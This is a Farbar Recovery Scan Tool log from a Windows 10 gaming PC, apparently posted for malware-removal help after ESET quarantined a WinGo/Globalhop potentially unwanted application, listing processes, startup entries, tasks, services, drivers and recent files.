C:\FRST\Quarantine\C\Users\Miggy\AppData\Local\Programs\RestMinder\sdk.dll a variant of WinGo/Globalhop.A potentially unwanted application cleaned by deleting
Here is FRST.txt
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 21-07-2022
Ran by Miggy (administrator) on MIGGYPC (Gigabyte Technology Co., Ltd. A320M-S2H) (21-07-2022 17:22:16)
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Platform: Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> ) C:\Program Files (x86)\Adobe\Adobe Sync\CoreSync\CoreSync.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud Helper.exe <2>
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\Adobe Installer.exe
(C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(C:\Program Files (x86)\ONN\onn.exe ->) () [File not signed] C:\Program Files (x86)\ONN\KbDaemon.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Rocksteady Studios Ltd.) [File not signed] C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham Knight\Binaries\Win64\BatmanAK.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <8>
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\GameOverlayUI.exe
(C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe <2>
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe
(C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\libs\node.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCopyAccelerator.exe
(Discord Inc. -> Discord Inc.) C:\Users\Miggy\AppData\Local\Discord\app-1.0.9005\Discord.exe <6>
(explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <12>
(explorer.exe ->) (Mega Limited -> Mega Limited) C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe
(explorer.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingApp_2207.1001.6.0_x64__8wekyb3d8bbwe\XboxAppServices.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Shenzhen Evision Semiconductor Technology Co., Ltd -> ) C:\Program Files (x86)\ONN\onn.exe
(explorer.exe ->) (Spotify AB -> Spotify Ltd) C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe <6>
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(svchost.exe ->) (Adobe Systems Incorporated) C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc\AdobeNotificationClient.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Realtek Semiconductor Corp) C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj\RtkUWP.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [856288 2019-10-29] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3071232 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-08-04] (Adobe Inc. -> )
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [850208 2022-05-12] (Adobe Inc. -> Adobe Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Discord] => C:\Users\Miggy\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32706000 2022-07-19] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-06] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [com.blitz.app] => C:\Users\Miggy\AppData\Local\Programs\Blitz\Blitz.exe --autostart (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Spotify] => C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe [19970464 2022-07-08] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3148016 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [ONN.] => C:\Program Files (x86)\ONN.\onn.exe [4436120 2021-11-14] (Shenzhen Evision Semiconductor Technology Co., Ltd -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\103.0.5060.134\Installer\chrmstp.exe [2022-07-20] (Google LLC -> Google LLC)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2022-06-05]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {03FE5072-C0AA-4FD4-A5AB-D07AB72268EE} - System32\Tasks\EOSv3 Scheduler onLogOn => C:\Users\Miggy\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [21737944 2022-07-21] (ESET, spol. s r.o. -> ESET)
Task: {0EC66224-E7F9-4896-AC22-604F9481BFD0} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2826498334-1472090739-1589450912-1002 => C:\Users\Miggy\AppData\Local\MEGAsync\MEGAupdater.exe [2531504 2022-06-23] (Mega Limited -> )
Task: {186D8709-E02A-4B19-ABAC-627A0E438748} - System32\Tasks\Opera GX scheduled Autoupdate 1643160997 => C:\Users\Miggy\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (No File)
Task: {19056965-D8E2-42BA-9198-BA321F141CBC} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {1D22A23D-A8AC-4920-9D07-A55F94E7D9EF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {252A9582-5B4F-4191-9010-B1BB0DFF8B00} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {316B07D7-B842-4CA6-9143-E47A44373CE9} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {34FBA49C-DB6E-466D-9949-8BA989A2D755} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {34FF53DA-910C-48FF-A27B-6C77610DC964} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {3A4DAEC6-DB69-41C4-B1CD-2D21D21DAF48} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-04-24] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {592A03EA-5CC2-4DCE-8D23-D389B778676B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7837ED71-57CE-4F2F-9588-701188B7FA26} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {8184678B-D5E0-4F9D-A393-D29C7ED8D710} - System32\Tasks\EOSv3 Scheduler onTime => C:\Users\Miggy\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [21737944 2022-07-21] (ESET, spol. s r.o. -> ESET)
Task: {8B92C189-E256-455B-B83D-BB9EA201CEC2} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {967C49C7-7365-496B-84CC-F943F6485839} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9B6AA54B-A7A6-44EE-B7FB-7023090FBCC6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {B22F7ED0-E54D-4755-BF66-7C277C4F783F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {C52D7066-5B3F-408A-AF5C-CCC3BD7E9982} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {D1EBC865-4929-4089-875B-C0F67EC2595B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {DAF682D5-38DA-494C-96CE-78534D6E588E} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {EACF08E7-F007-4892-8304-796E244D2C74} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {F0E4183A-6ABA-4A9B-B752-1347AA639C62} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {FC1BCD53-BD5F-46F6-B451-6482CD8B026A} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{37bbd38f-8acb-4c40-b864-ada8bb32978f}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{414f2442-2e8a-4d1e-a13b-9d87f203ed03}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5c61890f-5044-4e9c-8570-a54ea7f72db7}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{c27cbc7d-a6d2-4954-a213-802ef8bff43d}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{f885ed82-1422-4cda-906b-0d4ab502143f}: [DhcpNameServer] 192.168.254.254
Edge:
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\Miggy\AppData\Local\Microsoft\Edge\User Data\Default [2022-04-28]
FireFox:
========
FF DefaultProfile: 3lkpfjap.default
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\3lkpfjap.default [2022-07-17]
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\wmxmjnvg.default-release [2022-07-17]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
Chrome:
=======
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default [2022-07-21]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-07-05]
CHR Extension: (Adblock for Youtube™) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2022-07-11]
CHR Extension: (Google Docs Offline) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-07-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\System Profile [2022-07-17]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [919328 2022-04-18] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3815712 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3580200 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11238024 2022-07-21] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-06-21] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [553264 2020-12-28] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
S3 EQU8_19; C:\ProgramData\EQU8\Totally Accurate Battlegrounds\bin\anticheat.x64.equ8.exe [6221456 2021-10-02] (Int3 Software AB -> Int3 Software AB)
S3 EQU8_4; C:\ProgramData\EQU8\AimLab\bin\anticheat.x64.equ8.exe [8468624 2021-12-18] (Int3 Software AB -> Int3 Software AB)
S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10477800 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [8737992 2022-01-23] (PUBG CORPORATION -> PUBG Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [File not signed]
S3 EQU8_HELPER_19; C:\WINDOWS\system32\DRIVERS\EQU8_HELPER_19.sys [38032 2021-10-08] (Int3 Software AB -> )
S3 gdrv; C:\Windows\gdrv.sys [25640 2020-07-01] (Giga-Byte Technology -> Windows ® Server 2003 DDK provider)
R3 HHTHid; C:\WINDOWS\System32\drivers\HHTHid.sys [24784 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 HHTHid_ArtvhMouFiltr; C:\WINDOWS\System32\drivers\HHTHidMouFiltr.sys [23896 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-10-31] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
S3 VCamSDK; C:\WINDOWS\system32\DRIVERS\VCamSDK.sys [1090904 2019-12-22] (Shanghai Yitu Information Technology Co.,Ltd. -> e2eSoft)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8596792 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49576 2022-06-22] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [452856 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [91384 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-07-21 17:21 - 2022-07-21 17:21 - 000003842 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onLogOn
2022-07-21 17:21 - 2022-07-21 17:21 - 000003400 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onTime
2022-07-21 17:21 - 2022-07-21 17:21 - 000001172 _____ C:\Users\Miggy\Documents\eset.txt
2022-07-21 15:20 - 2022-07-21 15:20 - 000001382 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ESET Online Scanner.lnk
2022-07-21 15:20 - 2022-07-21 15:20 - 000001276 _____ C:\Users\Miggy\Desktop\ESET Online Scanner.lnk
2022-07-21 15:20 - 2022-07-21 15:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\ESET
2022-07-21 15:19 - 2022-07-21 15:19 - 015274968 _____ (ESET) C:\Users\Miggy\Downloads\esetonlinescanner.exe
2022-07-20 12:12 - 2022-07-20 20:49 - 000001064 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk
2022-07-19 16:46 - 2022-07-21 17:22 - 000000000 ____D C:\Users\Miggy\Downloads\FRST-OlderVersion
2022-07-17 18:37 - 2022-07-17 18:37 - 000000222 _____ C:\Users\Miggy\Desktop\Batman™ Arkham Knight.url
2022-07-17 17:51 - 2022-07-19 16:46 - 000001045 _____ C:\Users\Miggy\Downloads\Fixlog.txt
2022-07-15 22:41 - 2022-07-15 22:42 - 000000000 ____D C:\AdwCleaner
